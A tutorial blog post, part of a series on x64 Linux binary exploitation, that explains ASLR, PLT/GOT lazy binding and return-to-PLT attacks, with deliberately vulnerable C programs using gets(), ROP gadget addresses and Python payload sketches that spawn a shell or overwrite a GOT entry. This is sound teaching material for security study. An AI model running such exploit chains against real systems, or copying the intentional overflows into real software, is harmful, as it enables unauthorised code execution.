Introduction to x64 Linux Binary Exploitation (Part 5) - ASLR

Feb 16, 2022

This post is the fifth one of a series of articles in which we are exploring some basic x64 Linux Binary Exploitation techniques. We started with a simple buffer overflow in which all memory protection mechanisms were disabled and gradually we enabled them one by one in order to explore how they can be circumvented. More specifically:

In Part 1, we developed a Linux executable which was vulnerable to a buffer overflow and we exploited it after disabling all the memory protection mechanisms.
In Part 2, we enabled NX and we demonstrated how this protection can be circumvented using a return into library technique.
In Part 3, we enabled NX once again and we demonstrated an additional bypass technique which uses return into libc in conjunction with the mprotect system call.
In Part 4, we enabled the stack canaries protection, implemented by the StackGuard extension in gcc, and we examined under which conditions it might fail.

In this part we are going to discuss Address Space Layout Randomisation (ASLR for short) and once again explore if and when it can be bypassed. As always, before we start, you can use the links below to navigate to the other parts:

JMP to PART1 || PART2 || PART3 || PART4

About ASLR

Address Space Layout Randomisation is a security technique designed to prevent the exploitation of memory corruption vulnerabilities. The principle behind it is to randomly arrange the memory address space of a process, including the base of the executable and the positions of the stack, heap and libraries [1]. If the randomisation introduces enough entropy in the address space, then attacks that require a trampoline or a code reuse technique have to find alternative ways to navigate this random memory space. For example, in Part 3, we had to know the exact address where libc is loaded in order to perform the return into libc attack. With ASLR enabled this address changes on every single run, so it can no longer be hardcoded in the exploit. In Linux, you can configure ASLR using the randomize_va_space parameter. More specifically, you can:

Disable with:
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Enable with:
$ echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

Regarding the values of the randomize_va_space parameter, from Oracle’s Linux Security Guide we have the following:

0 → Disable ASLR. This setting is applied if the kernel is booted with the norandmaps boot parameter.
1 → Randomise the positions of the stack, virtual dynamic shared object (VDSO) page, and shared memory regions. The base address of the data segment is located immediately after the end of the executable code segment.
2 → Randomise the positions of the stack, VDSO page, shared memory regions, and the data segment. This is the default setting.

To change the value permanently, add the setting to /etc/sysctl.conf, for example: kernel.randomize_va_space = value, and run the sysctl -p command. To disable ASLR for a specific program and its child processes use: $ setarch `uname -m` -R program [args ...]. You can test ASLR by checking the shared library dependencies of an executable with the ldd command; when ASLR is enabled, the load addresses it reports differ between runs.
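The current setting can also be read programmatically. The following is a minimal sketch, assuming a Linux system with procfs mounted; the helper names describe_aslr and read_aslr_setting are made up for this illustration, and the descriptions simply paraphrase the list above.

```python
from pathlib import Path

# Meanings of kernel.randomize_va_space, paraphrased from the list above.
ASLR_MODES = {
    0: "disabled",
    1: "stack, VDSO page and shared memory regions randomised",
    2: "stack, VDSO page, shared memory regions and data segment randomised",
}


def describe_aslr(value):
    """Return a short description for a randomize_va_space value."""
    return ASLR_MODES.get(value, "unknown value")


def read_aslr_setting(path="/proc/sys/kernel/randomize_va_space"):
    """Read the current setting from procfs (Linux only)."""
    return int(Path(path).read_text().strip())


if __name__ == "__main__":
    try:
        current = read_aslr_setting()
        print(current, "->", describe_aslr(current))
    except (OSError, ValueError) as exc:
        print("could not read the ASLR setting:", exc)
```

Reading the value needs no special privileges; only changing it requires root, as in the tee commands shown earlier.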

As this post refers to x64 architectures, in the first part we are going to explore the Return2PLT attack (against a binary compiled with the -no-pie flag), while in the second we are going to chain a BoF with a memory leak vulnerability. Brute-forcing ASLR is not something that we are going to explore, since the 64-bit address space makes it impractical.

About PLT and GOT

PLT and GOT are two concepts which are strongly related to the way a binary is compiled and more specifically the way it is linked. Linking is the last step of a compilation process following the Preprocessing and Compilation of a source file. More specifically [2]:

Preprocessing — Processes directives (commands that begin with a # character) which can modify the source code before it is compiled.
Compiling — The modified source code is compiled into binary object code. This code is not yet executable.
Linking — The object code is combined with required supporting code to make an executable program. This step typically involves adding in any libraries that are required.

https://en.wikipedia.org/wiki/Linker_(computing)

There are two types of linking, static and dynamic:

Statically linked binaries are self-contained, having all of the code necessary for them to run within a single file.
Dynamically linked binaries (the default for gcc and most other compilers) rely on external routines, implemented by external shared libraries, for a large portion of their functionality.

For example, the system function’s actual implementation is part of the system C library. Typically, on current GNU/Linux systems, this is provided by libc.so.6, which is the name of the current GNU Libc library. Instead of going further into details about the pros and cons of each linking type, we will focus on dynamic linking and more specifically on how these external functions are located in a randomly allocated virtual memory space.

Relocation

Relocation is the process of connecting symbolic references with symbolic definitions. For example, when a program calls a function, the associated call instruction must transfer control to the proper destination address at execution. Relocatable files must have relocation entries, which describe how to modify their section contents, thus allowing executable and shared object files to hold the right information for a process’s program image [3]. So, if we omit the linking step from the overall compilation process, the object file that is created is not executable, and one main reason for that is the unresolved relocation entries in the Global Offset Table (.got).

In order to understand the resolution process, let's create a simple C program which makes use of the printf function:

#include <stdio.h>
#include <stdlib.h>

int main()
{
    printf("Hello ");
    printf("world");
    printf("\n");
    exit(0);
}

Compile it with the -no-pie flag in order to avoid some extra entropy and load it into gdb, setting a breakpoint in main:

Notice the references to the plt section corresponding to the printf, putchar and exit function calls. If we follow these references we will land in the following section:

There we notice a series of jumps (the highlighted ones) to the .got section:

Following these jumps we finally land in the .got table as depicted below:

So far we have seen that when a call to a shared library function takes place, the actual address is fetched from the .got table, which is referenced by the .plt table. What remains to be answered is how the .got ends up pointing to the right addresses. To find out, let's debug our program in gdb and follow these calls through the .plt and .got sections. Resuming from before, we have already set a breakpoint in main and we are about to follow the call to printf@plt:

The next jump goes through QWORD PTR [rip+0x2fa5], which resolves to 0x404020 in the .got.plt section. This entry points to 0x401040:

which lies in the .plt section and is followed by a jump to 0x401020:

Finally, from 0x401020 we notice a jump through 0x404010, which points to 0x00007ffff7fe7bb0:

which actually belongs to the memory space where the dynamic loader (ld) is loaded:

0x00007ffff7fe7bb0 in ?? () from /lib64/ld-linux-x86-64.so.2

Let's write down the jump chain during this first call to printf:

0x40118a @main → 0x401070 @.plt.sec → 0x404020 @.got.plt → 0x401040 @.plt → 0x401020 @.plt → 0x404010 @.got.plt → 0x7ffff7fe7bb0 @ld
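The RIP-relative operand seen in the first hop can be checked by hand. The sketch below assumes that the printf stub at 0x401070 starts with a 4-byte endbr64 followed by a 7-byte bnd jmp, which is the usual layout of a .plt.sec entry but is not shown in the text above; treat the instruction lengths as an assumption to be confirmed in your own disassembly.

```python
# Assumed layout of the printf stub in .plt.sec (not taken from the post):
#   0x401070: endbr64                          (4 bytes)
#   0x401074: bnd jmp QWORD PTR [rip+0x2fa5]   (7 bytes)
STUB_ADDR = 0x401070
ENDBR64_LEN = 4
JMP_LEN = 7
DISPLACEMENT = 0x2FA5


def rip_relative_target(insn_addr, insn_len, disp):
    """RIP holds the address of the NEXT instruction when the operand is evaluated."""
    return insn_addr + insn_len + disp


got_slot = rip_relative_target(STUB_ADDR + ENDBR64_LEN, JMP_LEN, DISPLACEMENT)
print(hex(got_slot))  # 0x404020
```

Under these assumptions the result matches the printf@got.plt slot at 0x404020 used in the chain above.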

Now set up a second breakpoint right before the second call to the printf function and follow the same process:

This time when we encounter the printf@got.plt entry we notice that it points to 0x00007ffff7e28e10:

which resolves to the printf address:

So, as expected we jump directly to the printf:

Let’s write down the jump chain again:

0x40118a @main → 0x401070 @.plt.sec → 0x404020 @.got.plt → 0x7ffff7e28e10 @ libc

Or, in a clearer view:

First call to printf@got.plt

Second call to printf@got.plt

What happened is that during the first call to printf, its address had not yet been written to the .got table, thus a call to ld had to take place:

The second time, though, the address was already known, so our program jumped directly to the printf function. If you wonder why the linker does not resolve everything once (e.g. during application initialisation) in order to populate the .got table, the following definition will make it clear:

Lazy binding (also known as lazy linking or on-demand symbol resolution) is the process by which symbol resolution isn’t done until a symbol is actually used. Functions can be bound on-demand, but data references can’t…. Lazy binding is implemented by providing some stub code that gets called the first time a function call to a lazy-resolved symbol is made. This stub is responsible for setting up the necessary information for a binding function that the runtime linker provides. The stub code then jumps to it [4].
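The behaviour described in this definition can be modelled in a few lines. The following is a toy sketch only: ToyProcess, call_via_plt and the dictionary standing in for the GOT are invented for illustration and say nothing about how ld is actually implemented.

```python
class ToyProcess:
    """Toy model of lazy binding; names and structure are illustrative only."""

    def __init__(self, library):
        self.library = library      # symbol name -> "real" function
        self.got = {}               # symbol name -> current call target
        self.resolver_calls = 0
        for name in library:
            # Before the first call every GOT slot leads back to the resolver stub.
            self.got[name] = self._make_stub(name)

    def _make_stub(self, name):
        def stub(*args):
            # Stand-in for the runtime linker: look the symbol up,
            # patch the GOT slot, then jump to the real function.
            self.resolver_calls += 1
            self.got[name] = self.library[name]
            return self.got[name](*args)
        return stub

    def call_via_plt(self, name, *args):
        # The PLT entry is just an indirect jump through the GOT slot.
        return self.got[name](*args)


proc = ToyProcess({"printf": lambda text: len(text)})
proc.call_via_plt("printf", "Hello ")   # first call goes through the resolver
proc.call_via_plt("printf", "world")    # second call jumps straight to printf
print(proc.resolver_calls)              # 1
```

The resolver runs once per symbol, which mirrors the two jump chains recorded above: the first call detours through ld, the second lands directly in libc.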

We are now ready to explore the Return2plt attack and how this might be used in order to bypass ASLR.

Return2plt

This attack requires a position dependent executable and, of course, no stack canary, which means that we have to compile the binary with the -no-pie and -fno-stack-protector flags. Such a binary is typically loaded at the same base address in virtual memory each time it is executed, contrary to a position independent executable (PIE), which is loaded at a random location. This simply means that when PIE is enabled, even if the binary is statically linked, ROP-type attacks will be more difficult to execute reliably. That being said, let’s examine some exploitation cases, starting from the easiest and moving to the more difficult ones.

Case 1: Existing call to system(X) function; where X represents a command that can be used in an exploitation scenario;
Plan: Use the BOF to force a call to this function by returning to the address indicated by the GOT relative entry

EXAMPLE:

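#include <stdio.h>
#include <stdlib.h>

/* Never called by the program; it only exists as a convenient return target. */
void unused_shell_func()
{
    system("/bin/sh");
}

void greet_me()
{
    char name[200];

    printf("Enter your name:");
    gets(name); /* no bounds check: this is the overflow */
    printf("Hi there %s !!\n", name);
}

int main(int argc, char *argv[])
{
    greet_me();
    return 0;
}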

Compile with the -no-pie -fno-stack-protector flags and let's get the unused_shell_func address using objdump:

Because the x64 ABI expects the stack to be 16-byte aligned when a function is called, we just need one extra ret instruction, which we can find in the vuln binary itself:

Our first exploit is straightforward:
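A minimal sketch of such a payload, using only the standard library. All three constants are placeholders: the 216-byte offset assumes that gcc reserves 208 bytes for name[200] below the saved RBP, and both addresses are hypothetical and must be replaced with the ones objdump and ropper report for your build.

```python
import struct

# Assumptions, not values from the post:
OFFSET_TO_RET = 216            # 208-byte frame for name[200] + 8-byte saved RBP
RET_GADGET = 0x40101A          # hypothetical address of a lone `ret`
UNUSED_SHELL_FUNC = 0x401176   # hypothetical address of unused_shell_func


def p64(value):
    """Pack an address as a little-endian 64-bit word."""
    return struct.pack("<Q", value)


def build_payload():
    padding = b"A" * OFFSET_TO_RET
    # The extra ret shifts RSP by 8 bytes so the stack is aligned on entry.
    return padding + p64(RET_GADGET) + p64(UNUSED_SHELL_FUNC)


payload = build_payload()
print(len(payload))
```

Since gets() stops reading at a newline, it is worth checking that none of the packed addresses contains the byte 0x0a before sending the payload.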

As well as the result:

Case 2: Existing call to system(X) function; where X does NOT represent a command that can be used in an exploitation scenario;
Plan: Search for hardcoded strings that can be used to build a useful X, then use the BOF in conjunction with ROP gadgets to pass X as the parameter of the system function and force a call to it.

EXAMPLE:

#include <stdio.h>
#include <stdlib.h>

void show_date()
{
    system("/bin/date");
}

void greet_me()
{
    char name[200];

    printf("Enter your name:");
    gets(name); /* no bounds check: this is the overflow */
    printf("%s !it is you again  !!! oh my gosh", name);
}

int main(int argc, char *argv[])
{
    show_date();
    greet_me();
    return 0;
}

Thankfully, the developer was mindful enough to leave some useful strings hardcoded. The plan (again) is pretty straightforward:

Search for a hardcoded string that serves our needs. In this case “sh” will do the trick.
ROP our way to system (ret, pop rdi ret)

Using ropper once again, we have the following addresses:

Similarly, gef’s search pattern yields the following results for “sh”:
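The same kind of search can be reproduced offline on raw bytes. The sketch below is an illustration rather than a replacement for gef: find_all is a made-up helper, and the sample buffer is just the greeting format string from greet_me() with its terminator, which is one likely place for a null-terminated "sh" to live.

```python
def find_all(haystack, needle):
    """Return every offset at which needle occurs in haystack."""
    offsets = []
    start = haystack.find(needle)
    while start != -1:
        offsets.append(start)
        start = haystack.find(needle, start + 1)
    return offsets


# The format string from greet_me(), as it would be stored with its terminator.
rodata = b"%s !it is you again  !!! oh my gosh\x00"

# system() needs a terminated string, so the null byte is part of the pattern.
hits = find_all(rodata, b"sh\x00")
print(hits)
```

An offset found this way still has to be added to the address at which the containing section is mapped; with a non-PIE binary that address is fixed, which is what makes the string usable under ASLR.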

Finally, the system@plt can be found in the show_date function:

We have everything we need to construct the exploitation script:

And get a shell:

What if no such useful string exists?
Plan: Search for hardcoded letters that can be used to build a useful X; use the BOF in conjunction with ROP gadgets to concatenate those letters; pass X as the parameter of the system function and force a call to it.

EXAMPLE:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Only here so that strcpy gets a PLT entry. */
void unused()
{
    char dummy1[10];
    char dummy2[10];
    strcpy(dummy1, dummy2);
}

void show_date()
{
    system("/bin/date");
}

void greet_me()
{
    char name[200];

    show_date();
    printf("Enter your name:");
    gets(name); /* no bounds check: this is the overflow */
    printf("hi %s !\n", name);
}

int main(int argc, char *argv[])
{
    greet_me();
    return 0;
}

Steps to exploitation:

Search for s,h letters in the non randomised memory space:

set h_address = 0x401034, s_address = 0x400476

Search for memory location to write these letters as string:

set write_to = 0x404038

Search for strcpy() and system() plt entries:

set system = 0x401084, strcpy = 0x401074

Search for gadgets:

We are going to use at most two parameters (for strcpy), so, following the x64 calling convention, we need to control both $rdi and $rsi. Using ropper to search for these gadgets, we get the following results:

ret = 0x40101a                  # ret
pop_rdi_ret = 0x4012a3          # pop rdi; ret;
pop_rsi_pop_r15_ret = 0x4012a1  # pop rsi; pop r15; ret;

We are also going to use a dummy value to satisfy the pop r15: dummy = b'C' * 8

The final exploit should look like below:
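A minimal sketch of such a payload, built with the standard library from the values collected in the steps above. Two things are assumptions rather than facts from the post: the 216-byte offset to the return address, and that the bytes found at s_address and h_address are each followed closely enough by a null byte for strcpy to produce a usable "sh" string. The helper strcpy_call is a name invented for this example.

```python
import struct

# Values collected in the steps above.
h_address = 0x401034
s_address = 0x400476
write_to = 0x404038
system = 0x401084
strcpy = 0x401074
ret = 0x40101A
pop_rdi_ret = 0x4012A3
pop_rsi_pop_r15_ret = 0x4012A1
dummy = b"C" * 8

OFFSET_TO_RET = 216  # assumption: 208-byte frame for name[200] + saved RBP


def p64(value):
    return struct.pack("<Q", value)


def strcpy_call(dst, src):
    """ROP fragment equivalent to strcpy(dst, src)."""
    return (p64(pop_rdi_ret) + p64(dst)
            + p64(pop_rsi_pop_r15_ret) + p64(src) + dummy
            + p64(strcpy))


chain = strcpy_call(write_to, s_address)         # string starting with "s"
chain += strcpy_call(write_to + 1, h_address)    # overwrite from the 2nd byte with "h..."
chain += p64(pop_rdi_ret) + p64(write_to)        # rdi -> "sh"
chain += p64(ret)                                # alignment fix before the call
chain += p64(system)

payload = b"A" * OFFSET_TO_RET + chain
print(len(payload))
```

Each strcpy fragment is six words long, so the two copies leave the stack alignment unchanged and a single ret before system is enough in this layout.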

Running the exploit will get us a shell:

Case 3: No system(X) call;
Plan: Overwrite the .got entry to point to the system function

I kept the most interesting case for last where we assume that the vulnerable binary doesn’t contain a call to the system function. Thus, we will try to overwrite the printf GOT entry in order to point to the system function by combining various ROP gadgets. More specifically:

Compute the offset between the printf and the system function
Subtract this offset from the value stored in the printf GOT entry
Set the proper parameters for the call to the system function
Perform a call to printf at PLT, which will now point at system (if everything goes as expected)

We will add some gadgets to our binary (using inline assembly) and although this may seem “forced”, let me assure you that when you exploit a functionally richer binary you will find a rich variety of gadgets. Our last case binary should look like below:

TL;DR we forced a sub %rbp, (%rdi); ret; gadget as well as an “sh” string in order to get directly to the point. We will break the exploit into several steps for clarity, so compile the C code above with gcc -no-pie -fno-stack-protector vuln.c -o vuln -D_FORTIFY_SOURCE=0 and let's try to exploit it:

Step 1: Find the distance between printf and system in libc

After loading the binary to gdb, use the xinfo command to get the virtual address of the system and printf functions:

As the distance between them is going to be constant, we can safely assume the following offset:

offset_to_system = 0x7ffff7e28e10 - 0x7ffff7e19410  # = 0xfa00
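The arithmetic, and the reason it survives ASLR, can be checked quickly. In this sketch the two addresses are the ones quoted above (printf at 0x7ffff7e28e10, system at 0x7ffff7e19410); the slide values are arbitrary examples chosen for illustration, and the result only holds for this particular libc build.

```python
printf_libc = 0x7FFFF7E28E10   # printf, as seen in the debugging session
system_libc = 0x7FFFF7E19410   # system, from the same session

offset_to_system = printf_libc - system_libc
print(hex(offset_to_system))   # 0xfa00

# ASLR moves the whole library, so both symbols shift by the same amount
# and the difference between them stays constant.
for slide in (0x0, 0x1000, 0x7F0000):        # arbitrary example slides
    got_value = printf_libc + slide           # what printf@got.plt would hold
    assert got_value - offset_to_system == system_libc + slide
```

This is why the exploit never needs to learn the libc base: it only adjusts whatever value the loader has already placed in the GOT.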

Step 2: Subtract the offset_to_system from the address where printf@got.plt points to

For this task we will use the “forced” gadget from our code. More specifically, we will pop the address of printf@got.plt into the RDI register, then pop the offset_to_system into the RBP register and finally use the sub %rbp, (%rdi) gadget. Using ropper (or any tool of your preference), locate the following gadgets:

Write down the address of each one:

ret = 0x40101a
pop_rdi_ret = 0x401233
pop_rbp_ret = 0x40113d
sub_rdi_rbp = 0x401156  # sub qword ptr [rdi], rbp; ret;

And let’s move to the next step.

Step 3: Find the address of the “sh” string as well as the address of the printf@plt

Write down the address of each one and let's assemble the final exploit:
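A minimal sketch of how the pieces could be chained, using only the standard library. The gadget addresses, the printf@got.plt address (0x404018) and the 0xfa00 offset come from this walkthrough; sh_string, printf_plt and the 216-byte offset are hypothetical placeholders that must be replaced with the values from your own binary. The alignment check assumes the usual frame layout, in which a called function has to sit at an odd word position in the chain.

```python
import struct

# Values from the walkthrough.
ret = 0x40101A
pop_rdi_ret = 0x401233
pop_rbp_ret = 0x40113D
sub_rdi_rbp = 0x401156        # sub qword ptr [rdi], rbp; ret;
printf_got = 0x404018         # printf@got.plt
offset_to_system = 0xFA00     # printf - system in this libc

# Hypothetical placeholders, NOT taken from the post.
sh_string = 0x402010
printf_plt = 0x401060
OFFSET_TO_RET = 216


def p64(value):
    return struct.pack("<Q", value)


chain = [
    pop_rdi_ret, printf_got,         # rdi = &printf@got.plt
    pop_rbp_ret, offset_to_system,   # rbp = printf - system
    sub_rdi_rbp,                     # *rdi -= rbp, the slot now holds system
    pop_rdi_ret, sh_string,          # rdi = address of "sh"
]
if len(chain) % 2 == 0:
    chain.append(ret)                # pad so the stack is aligned at the call
chain.append(printf_plt)             # printf@plt now jumps to system

payload = b"A" * OFFSET_TO_RET + b"".join(p64(word) for word in chain)
print(len(payload))
```

With seven words ahead of the final call the padding ret is not added in this layout; if your chain differs by one word, the check inserts it automatically.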

Redirect the output of the script above to a file named “payload” and load the binary into gdb, setting a breakpoint at the ret instruction of the greet_me() function. Finally, run the binary with r < payload:

After “hitting” the breakpoint we notice the following state in gdb:

The next instruction to be executed is pop rdi at 0x401233
The stack contains the printf@got.plt (0x00000000404018)

After execution RDI will point to printf@got.plt, which contains the address of printf in libc. After a few single steps, pop rbp is the next instruction and the value 0xfa00 (that is, 0x7ffff7e28e10 - 0x7ffff7e19410) is on the top of the stack:

So after execution RBP will contain the value 0xfa00, and what remains is to subtract 0xfa00 from the value stored at 0x00000000404018:

This part of the payload worked as expected, so next comes placing the address of the “sh” string in the RDI register and performing a call to printf@plt:

sh is on the top of the stack and will be popped to RDI

After continuing the execution, we notice a detach after vfork due to the shell spawn:

Which can be verified after running the binary outside of gdb:

Conclusion

We have reached the end of Part 5, where we bypassed ASLR by using the return2plt exploitation technique. Stay tuned for the last part, where we are going to enable all the memory related protections, including PIE, NX, StackGuard and ASLR, and explore how they can be circumvented.